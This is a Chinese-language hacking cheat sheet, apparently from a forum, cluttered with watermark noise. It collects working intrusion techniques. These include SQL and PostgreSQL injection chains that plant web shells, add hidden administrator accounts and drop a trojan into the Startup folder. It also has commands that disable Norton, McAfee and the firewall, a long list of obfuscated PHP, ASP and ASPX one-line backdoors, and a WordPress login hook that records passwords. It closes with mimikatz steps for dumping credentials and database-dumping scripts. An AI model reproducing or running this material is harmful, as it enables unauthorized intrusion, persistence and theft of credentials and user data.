+ d1 | j4 X5 ^% H2 p U- A9 Tinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );: q: _8 b$ c3 o9 p
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";6 i: h% [# h8 j, V: Y/ F( i# F
drop table a;# e r- T7 ]9 W7 j. ?5 m% q+ b
% D4 W3 D, V2 h+ F4 x& @英文版本:
# i& Y# ]$ `1 P
( c6 y: p9 ?: H: D9 z! }) Ruse test;$ ^# M3 R: i# P+ J
create table a (cmd text);+ S* w3 p& i! y I+ ~
insert into a values ("set wshshell=createobject (""wscript.shell"") " );6 D1 L( h1 v- T" H' D
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
{/ F5 ~# V; E1 \7 Hinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
$ |5 I) T* A5 aselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";; d8 P Q/ b" B
drop table a;& R: W! P8 O- O
1 A2 Z0 ]3 t8 d3 D: @4 ]3 `create table a (cmd BLOB);' P& E- `6 G4 y+ O; }4 A% T
insert into a values (CONVERT(木马的16进制代码,CHAR));) j% D& e/ V# l, m7 b" T5 @
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'+ L: C4 b4 T3 F3 r- O, |# [
drop table a;8 N) [$ j5 a- d9 ?' U/ Y5 @, c
# ^% h2 |6 y$ K7 o7 Q
记录一下怎么处理变态诺顿# }" u% @7 ]4 a" W
查看诺顿服务的路径( z2 L+ V( {% g H
sc qc ccSetMgr* @3 ]# s; v; l/ k" \" }; O
然后设置权限拒绝访问。做绝一点。。
% D5 b; D. Z; Y' i3 P/ U, @/ Ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system% R/ J) e/ }2 k# G( I
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
6 N4 h5 m0 K7 P+ \+ Xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
' c0 n; n# @( n* W& acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone' G: e% v$ \. C, i5 Q" N" |( G
9 K5 }. t. R; u( q' Q. M$ A# \( J然后再重启服务器3 y' S! ~' L% ~ ^
iisreset /reboot
( a4 j4 N% A: H" F这样就搞定了。。不过完事后。记得恢复权限。。。。! S. c' @. |4 ~; N# L; x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
( \7 B! i5 g/ j2 B* `% H* F7 Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
: Z. Z9 i' J" m6 }% W$ qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F" E- n. O$ a+ r" K" V d
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
, p% ^/ c3 t0 `0 r4 B! [SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin5 m* I" Z: g, }5 O
- o+ Z8 B7 N2 j+ G6 nEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
8 K% q4 V/ K8 E! v4 \" w+ h6 h% \5 p6 @6 D% b" T
postgresql注射的一些东西* ~' S" U2 a5 o, r. U: L
如何获得webshell3 C/ P' C3 o/ G% K; n9 x) n$ D
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
$ u# s4 Z, G7 c. N0 shttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
7 J/ a6 k' r6 @http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
; g, C/ v- d/ X7 |如何读文件6 W" _2 e* N7 d* q/ o7 y$ G
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);2 D M0 }+ D3 C/ x9 A o4 E& V
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;3 O" P( ]# A8 C3 b, |* x
http://127.0.0.1/postgresql.php?id=1;select * from myfile;: D. K1 O. _' c, z" A
: _# R' ^, [- ^# c [z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
4 Q p5 M/ D+ U4 P8 ~当然,这些的postgresql的数据库版本必须大于8.X
/ [$ e" P! N, G9 X# }* P创建一个system的函数:
t* ~ r7 {* S- m# @& KCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
3 W8 P+ z+ a/ n* P& j+ h, f6 n: Y3 l) K
创建一个输出表:) c; j- A+ J0 R5 F$ D
CREATE TABLE stdout(id serial, system_out text)
+ n5 g/ o( ?* ~2 } y3 Q8 h5 W! S* V6 k& {& E
执行shell,输出到输出表内:) v, F, r- U' n
SELECT system('uname -a > /tmp/test')+ ?, O6 F+ P( k& x
$ K/ y# W4 [- e
copy 输出的内容到表里面;% u0 R' b5 J$ W0 J5 z# Z9 t7 r% A
COPY stdout(system_out) FROM '/tmp/test'9 |! J0 `5 G: A) f% [ f+ Y; v
h, o* j, s! |. N* R. F5 F从输出表内读取执行后的回显,判断是否执行成功
; {. V7 B# x0 k% a* C; \- d+ ^
* J. w; o! g0 j& l8 f% O, [- \) wSELECT system_out FROM stdout0 f: m8 C1 }0 ?" L/ [. }, n
下面是测试例子& g' A5 i2 T* F& P3 |+ Z. }2 i. k
1 b8 Y E+ }: T' v. `. |, N$ V/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
6 N: [4 `6 l% ]
2 u# F* Y$ Q. c: V7 _( N, b; h; N l/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'/ c5 b- q# W% e& @' A
STRICT -- S, O# n2 O0 j7 A7 Z
1 ~; j0 x' W+ A$ U/store.php?id=1; SELECT system('uname -a > /tmp/test') --2 o) d* r2 x$ ~3 ]- v* ~/ ]9 i
6 R1 i4 z( I+ l6 s j0 f1 ^/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
3 m. U* q' \* {# D8 m" S; n0 s& M/ _2 h) a3 b
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
5 a+ f4 O( ^! w Z" T! m. W; Unet stop sharedaccess stop the default firewall/ r- w1 h; [, c
netsh firewall show show/config default firewall3 t/ c! D8 }# B4 W
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
8 ?" |( |$ N$ M- r, q+ onetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
, F) s1 k& ^5 i9 u& Z: V修改3389端口方法(修改后不易被扫出)
: @% `0 a- Z L3 c+ i修改服务器端的端口设置,注册表有2个地方需要修改& \! M/ ?! z) l5 V+ p3 f' N
! t5 Y$ y1 t' S, t. w6 d8 d
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
" o/ A1 b1 q- z5 t8 oPortNumber值,默认是3389,修改成所希望的端口,比如6000
% i) I- ?) q' g0 K, a d. C+ Q1 F+ u& }# W; p5 }
第二个地方:8 Y+ { {! k* P) T, B i
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 5 Z& N) e9 F" d, n- W$ L, t
PortNumber值,默认是3389,修改成所希望的端口,比如6000
: ^6 i) `! W: A; n a# j9 @6 P( x k2 R9 i
现在这样就可以了。重启系统就可以了2 Q3 t; @$ m# q5 ^. L
+ |. K# l, r4 Z) k# ?; E
查看3389远程登录的脚本
" R' z3 V4 ]2 b9 B: b1 [保存为一个bat文件
" g, e' D9 c& k* z" }date /t >>D:\sec\TSlog\ts.log
9 v$ x- f5 V4 k$ h/ g4 M+ Btime /t >>D:\sec\TSlog\ts.log
4 l6 N# {# q) t( Gnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log' s5 k5 r- }( E/ U+ h& C5 a1 ~
start Explorer
7 ^4 \* a3 W4 a) _
I& y1 c0 G/ F/ { L9 pmstsc的参数:0 M' j$ E) N* v/ Q% R( a9 b
) M1 l. {9 z# E. ~( ^2 b远程桌面连接. [, V* A7 J' [" {/ B; T
' z4 x6 [" y" d9 aMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]0 J1 P7 I% x& z( a* `
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
, h4 \6 S# K3 G1 Z8 u* l( [" |% U
; x5 h1 J; m# v- ~5 K2 \4 I<Connection File> -- 指定连接的 .rdp 文件的名称。
8 r3 [, v2 d( b/ w& p) p0 ] d! \
/v:<server[:port]> -- 指定要连接到的终端服务器。
1 V7 ~2 K; v6 _ M6 O# n. e w6 }2 G+ z
/console -- 连接到服务器的控制台会话。
: b' [; ~+ {9 M6 H7 u! O) u1 B$ z& q3 B( E3 M9 R8 w
/f -- 以全屏模式启动客户端。
2 r6 K2 l& V) g- |/ p
- e0 A5 c, o! |' u7 i/w:<width> -- 指定远程桌面屏幕的宽度。5 f7 G! n* F3 ^% `7 t4 v7 D! s3 i
1 \) I3 k1 E/ ]' A- O
/h:<height> -- 指定远程桌面屏幕的高度。4 j6 l# v2 k, @6 |' u5 A
, F5 M2 y) ~- y% k/edit -- 打开指定的 .rdp 文件来编辑。# |' R. @* o' Z" p8 n! J
+ ^" P) E+ H* K$ J; d
/migrate -- 将客户端连接管理器创建的旧版
0 m' ]: G$ a# J( F: S% g连接文件迁移到新的 .rdp 连接文件。
! C5 B6 N# _& v! ~1 s" @9 q: O. E, I& B! ~0 X6 c! Z3 S
5 Z3 R/ H" R/ g2 d( m" z( L
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就+ M5 |. P1 O0 Z1 S/ n) ^- K& ^
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量% S9 o6 Q3 |9 S% m$ O
! Y* S+ }: b; }命令行下开启3389# q) b, _: r, n; n# O+ C5 M( U; G6 Y/ u
net user asp.net aspnet /add
+ a( [5 P. N) I4 I/ jnet localgroup Administrators asp.net /add2 O5 A3 m9 a) o: V
net localgroup "Remote Desktop Users" asp.net /add
; \9 Q* f$ H3 O3 v0 Cattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
) i" @; v( O; C/ W6 S. g7 G9 j5 Vecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
2 r" R0 M. ~% |: I* `: r2 qecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
" H2 ~+ \1 r1 }1 vecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f- v9 t) m5 V5 c- ] g0 q
sc config rasman start= auto
0 a; y* o3 n" t: C* ksc config remoteaccess start= auto/ x5 P1 u! n% ~+ V, a8 {
net start rasman
! H- m" M9 B" K" G* X) d; n; ~$ o" Wnet start remoteaccess
( K2 k9 z+ H! ~. HMedia
- N) u% z! C- C, h7 E: _<form id="frmUpload" enctype="multipart/form-data"
6 V. W q: Z2 ?8 r( i! y# |action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
, m8 ~; q$ X/ q2 \<input type="file" name="NewFile" size="50"><br>
1 b! F0 I( A$ |/ |. z; H<input id="btnUpload" type="submit" value="Upload">: o2 d+ R2 o5 d ]% J( M
</form>8 d1 @+ k' u: I9 y
* R x: h5 U* i( a" E+ M
control userpasswords2 查看用户的密码
. F3 f/ f' C6 `2 l+ L2 @access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
P$ p- U) n3 { PSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a! n w' \+ [/ x
% M& B4 U' `/ W, i7 s: I9 N0 a141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:- {; b4 E; r" g4 ^0 s
测试1:* n6 e9 l) C1 q6 J$ [3 ^
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1! Z. s* `5 ?: x* ]1 d
7 n& d6 G: l. t1 l
测试2:0 Q& z6 u V( z0 _8 \- ^
9 v( q, w5 X$ t2 p# M. rcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
. c! s* e9 j1 o3 H: C' m2 O: V6 Q8 I4 m) s* B' R3 l2 u
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--/ z/ c6 i( K; R) c
0 o0 B. p$ ~" M s5 C
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t13 g+ [ g- I, [0 @1 f$ y* A. y: }) ^
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令$ F3 T, S+ w4 w M
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
+ D5 T, R( m4 O3 |/ t! K( a- ?net stop mcafeeframework
4 @* C v/ `5 k' dnet stop mcshield
3 j& b2 S- g2 [, j9 N. l% xnet stop mcafeeengineservice, s$ m- h1 p$ w2 d# _3 M4 a
net stop mctaskmanager( o1 o0 R- B4 W7 R1 p, C
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
9 U! w t1 H, }, }. K( O
/ n: a# }) c3 n8 v7 P VNCDump.zip (4.76 KB, 下载次数: 1) 6 J8 T3 s# s2 [. B- n
密码在线破解http://tools88.com/safe/vnc.php
* X& R( w' |$ g/ `VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
8 ~) ^8 ?0 I- v: m9 c0 ~# ^$ B1 `: j* J6 _
exec master..xp_cmdshell 'net user'& x" a0 K( R$ _
mssql执行命令。: j$ T- w' m% O1 M5 B
获取mssql的密码hash查询
# x: \ V- e! U! O4 D6 }select name,password from master.dbo.sysxlogins; b3 }' i; y% v7 v
# c' u& a5 I, J4 d) Nbackup log dbName with NO_LOG;% ~$ Q; Y- [' K% g& g
backup log dbName with TRUNCATE_ONLY;/ B! q, _' @4 N& N3 U& m" [( {
DBCC SHRINKDATABASE(dbName);
/ q9 a. [( [; J# D, Q* H3 ]mssql数据库压缩
+ q, p4 Y. `4 A3 J" H I: D- D, p1 O$ }! h2 Q7 S
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
/ _9 w0 i0 I2 W' [+ g. `9 j. O将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
" I, s1 _# d& w8 S0 j9 S0 A) r l3 K6 `/ x( w3 q! }
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
1 H9 R3 H+ {4 ~备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
7 F+ W1 c0 W2 Z
" Z' S6 w+ W2 O/ `Discuz!nt35渗透要点:
$ T2 |5 P* o0 \4 A( t(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
+ m. o e$ n4 B" o0 \(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
' [1 @, @( M& ~* A! j- R" r(3)保存。
/ u7 p4 ]5 X- B) W(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass; K, M: F. ^4 v4 k1 ~1 t0 R' @: {
d:\rar.exe a -r d:\1.rar d:\website\, {, o) b* o: C6 O- Q
递归压缩website
* x% h* I' |3 {* {注意rar.exe的路径$ G# i8 b$ }6 N, F v3 l/ o) g
* g0 I4 P+ J; ?; Z1 w; q: j
<?php4 \. S. j! x0 Q2 x* g. l
6 B: f4 c( o: X% D9 ?
$telok = "0${@eval($_POST[xxoo])}";; N. r$ v; S: R* B* P: D6 p
; J, t% y4 {; X/ Z- E7 s
$username = "123456";9 Z- M$ h \# E" T3 D
, A6 r* W0 ?8 ~( c! b, m& \+ e+ k
$userpwd = "123456";6 ^! Z4 x7 o, S* N
) M4 ~+ i. J$ N2 R( x g+ o$telhao = "123456";
8 L W. L P3 q2 S1 c+ g
' Z% F4 r6 E4 G/ F. ?$telinfo = "123456";
) ^ |! x- W/ ~+ J' `: t( d& T: D, N
?>' x: w% [7 N6 U0 n3 w& p
php一句话未过滤插入一句话木马
- ~ l0 B h6 R' ^8 Q% m" R' M8 V2 m. ?: V0 F: N1 N: J8 P7 \
站库分离脱裤技巧
% q% ~2 u* Q3 I: j$ V. M' Jexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'9 h' h7 z- @4 c1 j
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'+ S' H, h" M8 n. i2 k! Y" X, ]' r0 t
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。! J3 Y. k* a! x; `! Q
这儿利用的是马儿的专家模式(自己写代码)。
7 u! Q4 I$ f+ @- G7 z7 v. { ^ini_set('display_errors', 1);
+ [ _; h: B I8 Bset_time_limit(0);. u" ^' H/ _2 r, U9 B- c) c
error_reporting(E_ALL);1 {% p0 @/ }5 h+ D, t! ~9 j! y
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());, I3 ~ k6 G4 E. G; Q
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());- w2 `' Z1 T1 }3 x/ X# O' G
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
) t E! N) h7 \0 Z$i = 0;5 _0 @! C4 W* I' u: s) f
$tmp = '';: ^7 c6 x% k A4 t
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
/ ]2 ?, s* _ v! V i6 ?: B( Y I" g N $i = $i+1;
7 Z2 S3 V# N( b8 ~1 l2 H $tmp .= implode("::", $row)."\n";1 E" X3 V3 Z& ~5 d6 s ~" s
if(!($i%500)){//500条写入一个文件
N7 D& o2 a8 _/ V7 c $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
9 }2 J& \9 w: e+ [* q5 g" J* V file_put_contents($filename,$tmp);
/ N9 I+ A) R1 Z5 b3 V% C $tmp = '';/ g6 v( B/ x! @$ ~$ I" t, x
}' `" n/ H. B1 d8 C$ ^
}. K4 t0 X8 S6 t! J+ O L# u0 l
mysql_free_result($result);
% u5 C; @+ M, P0 ]5 {5 `/ @
; H! j7 E+ w! I" ?! ?' H* j8 V
4 e- [# x9 Y/ k7 l. L: G
. f. ^ \! f. j& x8 d" h//down完后delete5 U2 s, C4 t2 ~
& K8 i. k# C- I& j- Y1 q
/ q' O9 r; r$ _; i' x
ini_set('display_errors', 1);9 X: I- ?* w8 B7 U
error_reporting(E_ALL);
& y7 F% w/ P: }8 M2 @5 @' N$i = 0;
" L6 F, e3 x4 U6 B/ v' b: \) |while($i<32) {
8 ~( A" \$ W$ x( ~, H4 |! h $i = $i+1;
. ]' \! t& U4 ^* k $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';6 ~ Y/ m' {7 ^ C; C, i, A- N# \+ @2 A
unlink($filename);# ~6 Z/ g, ~+ }" G
}
, N+ P8 F- f( d n2 Y( Zhttprint 收集操作系统指纹2 L7 k9 a* Y0 ^ `# Z3 W+ F" `
扫描192.168.1.100的所有端口
- L1 H8 Q u8 f) enmap –PN –sT –sV –p0-65535 192.168.1.100
4 o( I* ]4 Y( l& P7 O" p* Ehost -t ns www.owasp.org 识别的名称服务器,获取dns信息
) ~5 l; O, r8 }- {host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输" L- ^$ V& c; c% u# H# {
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
, I: u+ G; E+ d1 L3 v; R; m6 D
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)8 }! o+ {+ q: n& H- h, A- y
" H4 C. [' h. s& G9 }4 ~/ T
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
1 d% i. R J' g0 U' v+ T; Q$ B' h7 ^, O
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x* S# a4 ^: C/ V
g' N& ^5 T5 N- i" s0 ? DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
+ d) a" G6 |9 z+ h1 B% G
7 e8 I' d( Q) |* c, E" [* z http://net-square.com/msnpawn/index.shtml (要求安装)
& K; Z$ \. z3 {" N! Z* M( E& J
9 p9 k1 g; m3 E: z tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)% P7 ?: A6 o/ Z# z2 Y1 I4 h
; |& b' c: |0 r0 z9 }
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)* a$ T2 R* l- H. d+ r
set names gb2312) `; i; S; u' ~. K8 L7 J9 w
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。8 }' r8 y& z! O# m* j! y3 z
- [. T. z# l9 q% hmysql 密码修改3 l) W- ~ f. W
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 1 Q7 Z4 c8 m/ [3 M" D' o& {
update user set password=PASSWORD('antian365.com') where user='root';2 A" ?1 D% a* T7 O% c: Z* Z
flush privileges;6 p' Z" b D8 u: P c
高级的PHP一句话木马后门
( v/ M1 h& ^' E& j0 N0 P: n ^* u9 g4 U' o: X; F' {8 [1 x- a4 r0 V
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀8 O; l' z# ^& b4 s/ F! h+ x
2 l! l* s4 K ]' s
1、, i! r" a$ G3 [0 Z4 l
! \' ], J1 u3 l3 n3 D8 F6 d
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";1 l5 g2 w9 y) z+ ^
: s( b; |8 z8 J& [4 N* ]
$hh("/[discuz]/e",$_POST['h'],"Access");
; w# f1 e; ]! E& X( s5 t
, U d D9 x1 H, O& P//菜刀一句话
$ G6 T2 A+ Y; m0 @0 H% y4 \9 v/ ?& ]4 N) _, d% A- z8 m% m( |. Z
2、
# H2 P, e1 p" J1 n# F) h, b( p0 {7 @8 `9 a% F. ^% h& }
$filename=$_GET['xbid'];
! h2 R/ v1 ?* c) U5 y# Z- k0 ?3 s% S# | _! L2 {6 P* Z
include ($filename); o7 H7 ?9 d8 ]
) J1 M7 R1 p3 L+ O+ F//危险的include函数,直接编译任何文件为php格式运行
1 i/ R/ P* b- q* H
$ Y S$ w7 a/ D# O0 w3、; r7 {" M" Z5 H: C, J7 o# i$ T% n
# u1 W5 h( r6 ^+ k# ?/ I$reg="c"."o"."p"."y";0 v& s+ z3 y* P1 g" F! u% Y9 A
" _0 {6 t8 h( Y& t4 B% `* {+ m
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);- h+ _" n9 X5 b: P& ?: B; p x
1 z7 s0 B- h; x5 u7 m# Q//重命名任何文件6 T& ~- B3 t1 v- d0 M
6 z) G1 i9 q: ?7 R! h6 @5 w4、
) _! |- o7 c8 w' ^! G: C. l( L& ]: d0 G+ t& k+ @1 {
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";9 \! o( ?$ E$ ~, v
( F- p7 d2 v' Y- u$gzid("/[discuz]/e",$_POST['h'],"Access");) ~( ]. u2 F4 A; ^% K5 K. k7 l
6 i; h: i& U( P! ]//菜刀一句话
3 N5 ^5 P! w9 P! d# R p) Q7 g5 `( Y# f
5、include ($uid);" c% `( \$ Y8 p; m
, A, F" r, Q# D$ e//危险的include函数,直接编译任何文件为php格式运行,POST & P0 }1 v' v$ J ~0 S. r
/ p( x( @4 V7 ^! W0 X& F2 S* _
6 a2 p3 x) j( Z//gif插一句话9 K! Z, @/ ~+ v1 Z1 o
* I1 E0 M! O2 x5 Z6、典型一句话- i/ H3 H ~4 D. ?: T0 ~) l
9 O6 O- a) B; `, x8 A2 S
程序后门代码
6 @; u6 K+ W1 t' U# @2 f<?php eval_r($_POST[sb])?>
& z3 n* ^0 J) Q$ S程序代码1 ~# Z0 k9 ^1 F& F M# W" m
<?php @eval_r($_POST[sb])?>4 g& U& e# g2 {' e
//容错代码9 ]% a# p. G6 X/ ?
程序代码
) E! h, X. [/ x, @<?php assert($_POST[sb]);?>" m- _3 E8 J" y, `4 `$ Z6 L
//使用lanker一句话客户端的专家模式执行相关的php语句
3 n' u; I9 j, l# ~, W2 N8 G程序代码6 Q, g) C5 m6 M0 C( m5 U8 @# @6 P
<?$_POST['sa']($_POST['sb']);?>; I- g/ S6 }* e# H* ?! y# u
程序代码
4 t6 R9 z8 b# L( C2 u& E* h/ H<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
% P& q; O) n, Y" s程序代码
! W' ? h. t" M# {: Z( \+ s<?php
7 [" Y9 _6 V r G- i' V@preg_replace("/[email]/e",$_POST['h'],"error");4 _9 b9 L* @; l8 n/ q# x
?>
: H+ C7 P, a, [. P+ n" D% s//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
, ~ ~3 J- v+ s. J8 T7 T- X程序代码* a- T# D) [ I& ^# e; v: }0 s
<O>h=@eval_r($_POST[c]);</O>) r* T4 _/ g# n% Y) C
程序代码) ^5 E7 E+ U/ d
<script language="php">@eval_r($_POST[sb])</script>
! S3 |7 s1 ^4 [1 W/ X//绕过<?限制的一句话
7 N/ P) X9 c( T O" U( K" C0 E' m
5 ?; V0 {. Y% d7 Z- p7 a# ihttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
y$ n# u3 f8 F+ V0 @ p0 z, R/ S详细用法:
! L7 w* ^/ v3 T1、到tools目录。psexec \\127.0.0.1 cmd
8 l5 p( I! _0 x- s% K2、执行mimikatz- @. W2 A' m& B
3、执行 privilege::debug8 \( B. n$ z1 z% m1 i% n0 d+ v
4、执行 inject::process lsass.exe sekurlsa.dll1 n3 Z7 V9 P/ w: s4 T% c% m) M
5、执行@getLogonPasswords5 L. F. }3 y; o9 i7 P7 ]- n: ?% t
6、widget就是密码
3 i7 V# t& a8 g7、exit退出,不要直接关闭否则系统会崩溃。
' Z; W J% L" _* g0 ~
3 u/ ?3 {, e4 l" Zhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
' @7 ^+ V# v' U" t, K0 v* U; _( e4 ^2 }) w0 L
自动查找系统高危补丁* f# n& c7 g/ q$ V/ p2 ]
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
2 ?0 a/ N w! z3 A& y0 q5 r$ D* F9 s
) r0 ^. r, J6 p [$ e突破安全狗的一句话aspx后门$ J! N' @/ e" _4 t1 u; ]
<%@ Page Language="C#" ValidateRequest="false" %>9 d- j4 P% K9 d( I) }4 L5 G6 a
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
& t& ]0 c& ]1 r w. V3 ^8 \) [/ wwebshell下记录WordPress登陆密码6 f0 j/ ~' N, c2 Q3 V) G; w/ `
webshell下记录Wordpress登陆密码方便进一步社工
! y0 R# U! }6 D: j; J" a在文件wp-login.php中539行处添加:# ]1 O2 L9 _5 x6 |; ~
// log password
6 K+ G0 ^- W( w; w) p) D- O3 j$log_user=$_POST['log'];. Q3 V7 j7 w( B: t. p7 ^' J. b# J! Z
$log_pwd=$_POST['pwd'];3 D7 A; K4 @! I5 x) }
$log_ip=$_SERVER["REMOTE_ADDR"];8 o4 F) ^* ~3 G! S% I# r4 ^+ Y
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;! |' y8 W% e! z
$txt=$txt.”\r\n”;/ g0 F; J8 ?; V$ M7 j# s6 G
if($log_user&&$log_pwd&&$log_ip){
* L& \! V$ r' X @) U+ Z# d9 w@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
7 \, ]7 c0 u L5 N; ]}
5 i+ H, w8 d3 d& f; K& L5 T5 S, }当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
7 J& d8 y! s4 b& m+ G5 [0 t$ A3 m就是搜索case ‘login’
# q+ I4 \- X1 S) _在它下面直接插入即可,记录的密码生成在pwd.txt中,
( f! ^# v$ u* ]/ T其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
7 h; i3 D' z9 r3 e利用II6文件解析漏洞绕过安全狗代码:
$ y% m- f; O. N4 R;antian365.asp;antian365.jpg
! t; F* H/ [5 [1 I; L( H2 D
